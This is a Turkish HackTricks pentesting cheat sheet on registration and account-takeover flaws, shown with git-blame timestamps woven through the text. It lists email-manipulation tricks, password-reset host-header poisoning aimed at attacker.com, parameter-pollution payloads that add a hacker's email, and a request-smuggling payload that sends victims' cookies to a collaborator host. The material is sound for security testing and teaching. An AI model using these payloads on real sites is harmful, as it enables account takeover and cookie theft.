2024-07-19 16:17:42 +00:00
# Kayı t & Ele Geçirme Açı kları
2022-04-28 16:01:33 +00:00
2024-07-19 16:17:42 +00:00
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapı n:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCP Hacking'i öğrenin ve pratik yapı n: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 16:17:42 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 16:17:42 +00:00
< summary > HackTricks'i Destekleyin< / summary >
2024-02-03 14:45:32 +00:00
2024-07-19 16:17:42 +00:00
* [**abonelik planları nı ** ](https://github.com/sponsors/carlospolop ) kontrol edin!
* **Bize katı lı n** 💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) veya **bizi** **Twitter'da** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )** takip edin.**
* **Hacking ipuçları nı paylaşarak** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) ve [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github reposuna PR gönderin.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 16:17:42 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-04-18 04:08:29 +00:00
### [WhiteIntel](https://whiteintel.io)
2024-04-18 03:38:35 +00:00
2024-05-05 22:43:52 +00:00
< figure > < img src = "../.gitbook/assets/image (1227).png" alt = "" > < figcaption > < / figcaption > < / figure >
2024-04-18 03:38:35 +00:00
2024-07-19 16:17:42 +00:00
[**WhiteIntel** ](https://whiteintel.io ), bir şirketin veya müşterilerinin **zararlı yazı lı mlar** tarafı ndan **tehdit edilip edilmediğini** kontrol etmek için **ücretsiz** işlevsellikler sunan bir **karanlı k ağ** destekli arama motorudur.
2024-04-18 03:38:35 +00:00
2024-07-19 16:17:42 +00:00
WhiteIntel'in ana hedefi, bilgi çalan zararlı yazı lı mlardan kaynaklanan hesap ele geçirmeleri ve fidye yazı lı mı saldı rı ları yla mücadele etmektir.
2024-04-18 03:38:35 +00:00
2024-07-19 16:17:42 +00:00
Web sitelerini kontrol edebilir ve motorları nı **ücretsiz** deneyebilirsiniz:
2024-04-18 03:38:35 +00:00
{% embed url="https://whiteintel.io" %}
2024-05-05 22:43:52 +00:00
***
2024-04-18 03:38:35 +00:00
2024-02-10 18:14:16 +00:00
## Kayı t Ele Geçirme
2022-04-28 16:01:33 +00:00
2024-07-19 16:17:42 +00:00
### Çift Kayı t
2021-06-27 14:55:59 +00:00
2024-07-19 16:17:42 +00:00
* Mevcut bir kullanı cı adı kullanarak oluşturmayı deneyin
2024-02-10 18:14:16 +00:00
* E-postayı değiştirerek kontrol edin:
* büyük harf
* \+1@
2024-07-19 16:17:42 +00:00
* e-postada bazı noktalar ekleyin
2024-02-10 18:14:16 +00:00
* e-posta adı nda özel karakterler (%00, %09, %20)
2024-07-19 16:17:42 +00:00
* E-postadan sonra siyah karakterler koyun: `test@test.com a`
2024-02-10 18:14:16 +00:00
* victim@gmail.com@attacker.com
* victim@attacker.com@gmail.com
2021-06-27 14:55:59 +00:00
2024-07-19 16:17:42 +00:00
### Kullanı cı Adı Sayı mı
2021-06-27 14:55:59 +00:00
2024-07-19 16:17:42 +00:00
Bir kullanı cı adı nı n uygulama içinde zaten kayı tlı olup olmadı ğı nı anlamaya çalı şı n.
2021-06-27 14:55:59 +00:00
2024-02-10 18:14:16 +00:00
### Şifre Politikası
2021-06-27 14:55:59 +00:00
2024-07-19 16:17:42 +00:00
Bir kullanı cı oluştururken şifre politikası nı kontrol edin (zayı f şifreler kullanı p kullanamayacağı nı zı kontrol edin).\
Bu durumda kimlik bilgilerini brute force ile denemeyi deneyebilirsiniz.
2021-06-27 14:55:59 +00:00
2024-02-10 18:14:16 +00:00
### SQL Enjeksiyonu
2021-06-27 14:55:59 +00:00
2024-07-19 16:17:42 +00:00
[**Bu sayfayı kontrol edin** ](sql-injection/#insert-statement ) kayı t formları nda hesap ele geçirmeleri veya bilgi çı karmak için **SQL Enjeksiyonları ** ile nası l deneme yapacağı nı zı öğrenmek için.
2021-06-27 14:55:59 +00:00
2024-02-10 18:14:16 +00:00
### Oauth Ele Geçirmeleri
2021-06-27 14:55:59 +00:00
2023-02-16 18:26:56 +00:00
{% content-ref url="oauth-to-account-takeover.md" %}
[oauth-to-account-takeover.md ](oauth-to-account-takeover.md )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-06-27 14:55:59 +00:00
2024-07-19 16:17:42 +00:00
### SAML Açı kları
2021-06-27 14:55:59 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="saml-attacks/" %}
[saml-attacks ](saml-attacks/ )
{% endcontent-ref %}
2021-06-27 15:43:01 +00:00
2024-02-10 18:14:16 +00:00
### E-posta Değiştirme
2021-06-27 15:43:01 +00:00
2024-07-19 16:17:42 +00:00
Kayı tlı olduğunuzda e-postayı değiştirmeyi deneyin ve bu değişikliğin doğru bir şekilde doğrulanı p doğrulanmadı ğı nı veya rastgele e-postalara değiştirip değiştiremeyeceğinizi kontrol edin.
2021-06-27 14:55:59 +00:00
2024-04-18 03:38:35 +00:00
### Daha Fazla Kontrol
2021-06-27 14:55:59 +00:00
2024-07-19 16:17:42 +00:00
* **geçici e-postalar** kullanı p kullanamayacağı nı zı kontrol edin
* **Uzun** **şifre** (>200) **DoS** 'ye yol açar
* **Hesap oluşturma üzerindeki hı z limitlerini kontrol edin**
* username@**burp\_collab**.net kullanı n ve **callback** 'i analiz edin
2021-11-30 00:17:48 +00:00
2024-05-05 22:43:52 +00:00
## **Şifre Sı fı rlama Ele Geçirme**
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
### Referrer Üzerinden Şifre Sı fı rlama Token Sı zı ntı sı <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
1. E-posta adresinize şifre sı fı rlama talep edin
2024-02-10 18:14:16 +00:00
2. Şifre sı fı rlama bağlantı sı na tı klayı n
3. Şifreyi değiştirmeyin
2024-07-19 16:17:42 +00:00
4. Herhangi bir 3. parti web sitesine tı klayı n (örneğin: Facebook, twitter)
5. Burp Suite proxy'sinde isteği yakalayı n
6. Referer başlı ğı nı n şifre sı fı rlama token'ı nı sı zdı rı p sı zdı rmadı ğı nı kontrol edin.
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
### Şifre Sı fı rlama Zehirleme <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
1. Burp Suite'te şifre sı fı rlama isteğini yakalayı n
2. Burp Suite'te aşağı daki başlı kları ekleyin veya düzenleyin: `Host: attacker.com` , `X-Forwarded-Host: attacker.com`
3. Değiştirilmiş başlı kla isteği iletin\
2024-02-10 18:14:16 +00:00
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. _host başlı ğı na_ dayalı bir şifre sı fı rlama URL'si arayı n: `https://attacker.com/reset-password.php?token=TOKEN`
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
### E-posta Parametresi Üzerinden Şifre Sı fı rlama <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
2021-11-30 00:17:48 +00:00
```powershell
# parameter pollution
email=victim@mail.com& email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
2024-07-19 16:17:42 +00:00
### IDOR on API Parameters <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
1. Saldı rgan, hesabı yla giriş yapmalı ve **Şifreyi Değiştir** özelliğine gitmelidir.
2. Burp Suite'i başlatı n ve isteği yakalayı n.
3. Tekrarlayı cı sekmesine gönderin ve parametreleri düzenleyin: Kullanı cı ID/e-posta\
2024-02-10 18:14:16 +00:00
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
### Weak Password Reset Token <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
Şifre sı fı rlama jetonu her seferinde rastgele üretilmeli ve benzersiz olmalı dı r.\
Jetonun süresinin dolup dolmadı ğı nı veya her zaman aynı olup olmadı ğı nı belirlemeye çalı şı n, bazı durumlarda üretim algoritması zayı f olabilir ve tahmin edilebilir. Aşağı daki değişkenler algoritma tarafı ndan kullanı labilir.
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
* Zaman damgası
* Kullanı cı ID'si
2024-02-10 18:14:16 +00:00
* Kullanı cı nı n E-postası
* Ad ve Soyad
* Doğum Tarihi
* Kriptografi
2024-07-19 16:17:42 +00:00
* Sadece sayı
2024-04-18 03:38:35 +00:00
* Küçük jeton dizisi (karakterler arası nda \[A-Z,a-z,0-9])
2024-07-19 16:17:42 +00:00
* Jeton tekrar kullanı mı
2024-04-18 03:38:35 +00:00
* Jetonun son kullanma tarihi
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
### Leaking Password Reset Token <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
1. Belirli bir e-posta için API/UI kullanarak bir şifre sı fı rlama isteği tetikleyin, örneğin: test@mail.com
2. Sunucu yanı tı nı inceleyin ve `resetToken` kontrol edin.
3. Ardı ndan, jetonu `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]` gibi bir URL'de kullanı n.
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
### Password Reset Via Username Collision <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
1. Sistemde, kurbanı n kullanı cı adı yla aynı olan bir kullanı cı adı yla kaydolun, ancak kullanı cı adı nı n önüne ve/veya arkası na boşluklar ekleyin. örneğin: `"admin "`
2. Kötü niyetli kullanı cı adı nı zla bir şifre sı fı rlama talep edin.
3. E-postanı za gönderilen jetonu kullanarak kurbanı n şifresini sı fı rlayı n.
4. Yeni şifreyle kurbanı n hesabı na bağlanı n.
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
CTFd platformu bu saldı rı ya karşı savunması zdı .\
Bakı nı z: [CVE-2020-7245 ](https://nvd.nist.gov/vuln/detail/CVE-2020-7245 )
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
### Account Takeover Via Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
1. Uygulama içinde veya çerezlerin ana alanla sı nı rlı olduğu bir alt alan adı nda bir XSS bulun: `*.domain.com`
2. Mevcut **oturum çerezini** sı zdı rı n.
3. Çerezi kullanarak kullanı cı olarak kimlik doğrulaması yapı n.
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
### Account Takeover Via HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
1\. **smuggler** kullanarak HTTP İstek Kaçı rma türünü tespit edin (CL, TE, CL.TE)\
2021-11-30 00:17:48 +00:00
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h` \
2024-07-19 16:17:42 +00:00
2\. Aşağı daki verilerle `POST / HTTP/1.1` 'i geçersiz kı lacak bir istek oluşturun:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` amacı yla kurbanları burpcollab'a yönlendirmek ve çerezlerini çalmak\
3\. Son istek aşağı daki gibi görünebilir
2021-11-30 00:17:48 +00:00
```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
2024-07-19 16:17:42 +00:00
Hackerone bu hatayı istismar eden raporlar\
\* [https://hackerone.com/reports/737140 ](https://hackerone.com/reports/737140 )\
\* [https://hackerone.com/reports/771666 ](https://hackerone.com/reports/771666 )
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
### CSRF ile Hesap Ele Geçirme <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
2024-05-05 22:43:52 +00:00
2024-07-19 16:17:42 +00:00
1. CSRF için bir payload oluşturun, örneğin: “Şifre değişikliği için otomatik gönderim yapan HTML formu”
2. Payload'u gönderin
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
### JWT ile Hesap Ele Geçirme <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
JSON Web Token, bir kullanı cı yı kimlik doğrulamak için kullanı labilir.
2021-11-30 00:17:48 +00:00
2024-07-19 16:17:42 +00:00
* JWT'yi başka bir Kullanı cı ID'si / E-posta ile düzenleyin
* Zayı f JWT imzası nı kontrol edin
2021-11-30 00:17:48 +00:00
{% content-ref url="hacking-jwt-json-web-tokens.md" %}
[hacking-jwt-json-web-tokens.md ](hacking-jwt-json-web-tokens.md )
{% endcontent-ref %}
2024-02-10 18:14:16 +00:00
## Referanslar
2021-11-30 00:17:48 +00:00
* [https://salmonsec.com/cheatsheet/account\_takeover ](https://salmonsec.com/cheatsheet/account\_takeover )
2022-04-28 16:01:33 +00:00
2024-04-18 04:08:29 +00:00
### [WhiteIntel](https://whiteintel.io)
2024-04-18 03:38:35 +00:00
2024-05-05 22:43:52 +00:00
< figure > < img src = "../.gitbook/assets/image (1227).png" alt = "" > < figcaption > < / figcaption > < / figure >
2024-04-18 03:38:35 +00:00
2024-07-19 16:17:42 +00:00
[**WhiteIntel** ](https://whiteintel.io ) **dark-web** destekli bir arama motorudur ve bir şirketin veya müşterilerinin **tehdit eden** **malware'ler** tarafı ndan **kompromize** olup olmadı ğı nı kontrol etmek için **ücretsiz** işlevsellikler sunar.
2024-04-18 03:38:35 +00:00
2024-07-19 16:17:42 +00:00
WhiteIntel'in ana hedefi, bilgi çalan malware'lerden kaynaklanan hesap ele geçirmeleri ve fidye yazı lı mı saldı rı ları yla mücadele etmektir.
2024-04-18 03:38:35 +00:00
2024-07-19 16:17:42 +00:00
Web sitelerini kontrol edebilir ve motorları nı **ücretsiz** deneyebilirsiniz:
2024-04-18 03:38:35 +00:00
{% embed url="https://whiteintel.io" %}
2024-07-19 16:17:42 +00:00
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapı n:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCP Hacking'i öğrenin ve pratik yapı n: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 16:17:42 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 16:17:42 +00:00
< summary > HackTricks'i Destekleyin< / summary >
2024-02-03 14:45:32 +00:00
2024-07-19 16:17:42 +00:00
* [**abonelik planları nı ** ](https://github.com/sponsors/carlospolop ) kontrol edin!
* **💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) katı lı n ya da **Twitter** 'da **bizi takip edin** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Hacking ipuçları nı paylaşmak için** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) ve [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github reposuna PR gönderin.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 16:17:42 +00:00
{% endhint %}